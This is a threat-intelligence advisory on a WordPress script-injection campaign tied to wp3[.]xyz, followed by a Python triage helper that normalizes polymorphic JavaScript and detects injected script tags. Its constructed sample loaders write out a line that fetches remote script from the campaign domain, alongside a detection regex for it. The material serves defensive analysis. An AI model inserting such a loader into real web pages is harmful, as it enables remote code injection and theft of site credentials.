Intel Name: Ongoing “wp3[.]xyz” campaign activity
Date of Scan: January 24, 2025
Impact: High
Summary: This campaign uses scripts linked to the domain wp3[.]xyz, injected into compromised WordPress sites, to steal sensitive data such as admin login credentials. Our telemetry shows activity beginning as early as October 2024, with more than 10,000 websites compromised and infections peaking in December 2024. We identified more than a dozen polymorphic JavaScript samples; each alters minor elements such as log statements so that the file hash changes while the behaviour does not, which defeats matching on per-sample hashes. The domain wp3[.]xyz, re-registered on October 3, 2024, is hosted on 192.142.10[.]6 (Ultrahost, Inc., NL), an IP address associated with other malicious .xyz domains.
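Added example, not part of the original report: a small Python triage helper showing why a per-sample hash is a weak indicator for this campaign and what to key on instead. It strips comments, console.* logging calls and whitespace from a script before hashing, so two variants that differ only in a log statement collapse to one fingerprint, and it scans page HTML for script tags that point at wp3[.]xyz (matching the defanged form too, so IOC lists can be pasted as-is). The two JavaScript samples, the HTML fragment and the path /loader.js are constructed stand-ins for illustration, not the actual campaign payload.

```python
import hashlib
import re

# Constructed stand-in samples (not the real wp3[.]xyz payload): two variants that
# differ only in a console.log statement and a comment, the hash-changing
# polymorphism described in the summary. The path "/loader.js" is hypothetical.
SAMPLE_A = """
(function(){
  console.log("init v1");
  var s = document.createElement("script");
  s.src = "https://wp3.xyz/loader.js";
  document.head.appendChild(s);
})();
"""
SAMPLE_B = """
/* build 12-2024 */
(function(){
  console.log("loader ready; retrying");
  var s = document.createElement("script");
  s.src = "https://wp3.xyz/loader.js";
  document.head.appendChild(s);
})();
"""

# Constructed WordPress page fragment with one injected script tag.
SAMPLE_HTML = """<html><head><title>Blog</title>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://wp3.xyz/loader.js"></script>
</head><body></body></html>"""

IOC_DOMAIN_RE = re.compile(r"wp3\[?\.\]?xyz", re.I)  # plain or defanged wp3[.]xyz
CONSOLE_CALL_RE = re.compile(r"console\.(?:log|debug|info|warn|error)\s*\([^)]*\)\s*;?")
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc\s*=\s*[\"']([^\"']+)[\"']", re.I)


def strip_comments(js: str) -> str:
    """Drop // and /* */ comments while leaving string literals untouched,
    so a URL such as https://wp3.xyz/... inside quotes is not cut off."""
    out, i, n, quote = [], 0, len(js), None
    while i < n:
        c = js[i]
        if quote:                      # inside a string literal: copy verbatim
            out.append(c)
            if c == "\\" and i + 1 < n:  # keep escaped char with its backslash
                out.append(js[i + 1])
                i += 2
                continue
            if c == quote:
                quote = None
            i += 1
            continue
        if c in "\"'`":
            quote = c
            out.append(c)
            i += 1
            continue
        if js.startswith("//", i):     # line comment: skip to end of line
            j = js.find("\n", i)
            i = n if j == -1 else j
            continue
        if js.startswith("/*", i):     # block comment: skip past closing */
            j = js.find("*/", i + 2)
            i = n if j == -1 else j + 2
            continue
        out.append(c)
        i += 1
    return "".join(out)


def normalize(js: str) -> str:
    """Remove the cosmetic parts (comments, console.* calls, whitespace) that the
    polymorphic variants change, keeping the code that actually does the work."""
    js = strip_comments(js)
    js = CONSOLE_CALL_RE.sub("", js)
    return re.sub(r"\s+", "", js)


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def triage(js: str) -> dict:
    """Raw hash (changes per variant), normalized hash (stable across variants)
    and whether the script references the campaign domain."""
    return {
        "sha256": sha256_hex(js),
        "normalized_sha256": sha256_hex(normalize(js)),
        "references_ioc_domain": bool(IOC_DOMAIN_RE.search(js)),
    }


def find_injected_scripts(html: str) -> list:
    """Return the src URLs of script tags in a page that point at wp3[.]xyz."""
    return [src for src in SCRIPT_SRC_RE.findall(html) if IOC_DOMAIN_RE.search(src)]


if __name__ == "__main__":
    for name, js in (("A", SAMPLE_A), ("B", SAMPLE_B)):
        print(name, triage(js))
    print("injected:", find_injected_scripts(SAMPLE_HTML))
```

The normalization is deliberately coarse: it only has to absorb the edits the summary describes (log statements, comments, layout). A regex literal containing `//` or a console call whose argument contains `)` would not be handled, so a production pipeline should tokenize the JavaScript properly and, for the cleanest signal, hunt on the loader domain and IP rather than on any sample hash.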